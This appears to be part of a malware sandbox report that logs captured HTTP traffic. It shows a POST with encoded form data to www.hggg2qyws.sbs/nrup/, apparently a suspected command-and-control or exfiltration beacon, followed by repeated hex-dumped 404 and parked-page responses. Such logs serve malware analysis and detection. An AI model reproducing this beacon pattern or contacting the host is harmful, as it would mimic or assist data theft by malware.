Source: unknown HTTP traffic detected: POST /nrup/ HTTP/1.1Host: www.hggg2qyws.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.hggg2qyws.sbsConnection: closeContent-Length: 208Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.hggg2qyws.sbs/nrup/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 34 7a 42 3d 52 7a 67 2b 4f 43 36 4d 75 47 43 44 31 74 67 55 76 6a 35 55 64 4d 75 48 7a 69 53 75 6c 75 47 4b 59 49 6c 43 31 68 41 76 52 50 59 53 47 73 38 6e 4e 6e 6b 66 76 74 64 62 2b 41 64 6b 35 72 41 6a 38 48 76 6e 47 34 72 55 46 4e 67 2f 2f 55 47 39 6e 72 48 52 4a 78 77 57 4e 36 5a 73 37 6a 4c 35 4b 33 68 30 76 7a 50 39 4b 32 76 59 57 4c 76 2b 4f 70 6e 4f 62 48 64 31 76 53 30 6e 71 45 49 6b 38 67 6e 4e 2b 57 4b 72 32 4b 72 75 4b 43 44 30 49 70 47 78 42 6d 72 71 4e 50 34 5a 46 51 66 74 63 57 31 51 4a 31 73 2b 48 79 59 75 6e 6a 45 45 45 52 58 4e 4c 5a 4a 39 49 41 63 5a 44 76 59 4a 38 42 41 33 34 4e 6f 5a 53 57 4e 61 Data Ascii: 4zB=Rzg+OC6MuGCD1tgUvj5UdMuHziSuluGKYIlC1hAvRPYSGs8nNnkfvtdb+Adk5rAj8HvnG4rUFNg//UG9nrHRJxwWN6Zs7jL5K3h0vzP9K2vYWLv+OpnObHd1vS0nqEIk8gnN+WKr2KruKCD0IpGxBmrqNP4ZFQftcW1QJ1s+HyYunjEEERXNLZJ9IAcZDvYJ8BA34NoZSWNa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:09 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:11 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:14 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:17 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:22 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 05:26:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 05:26:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 05:26:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:30 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 05:26:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 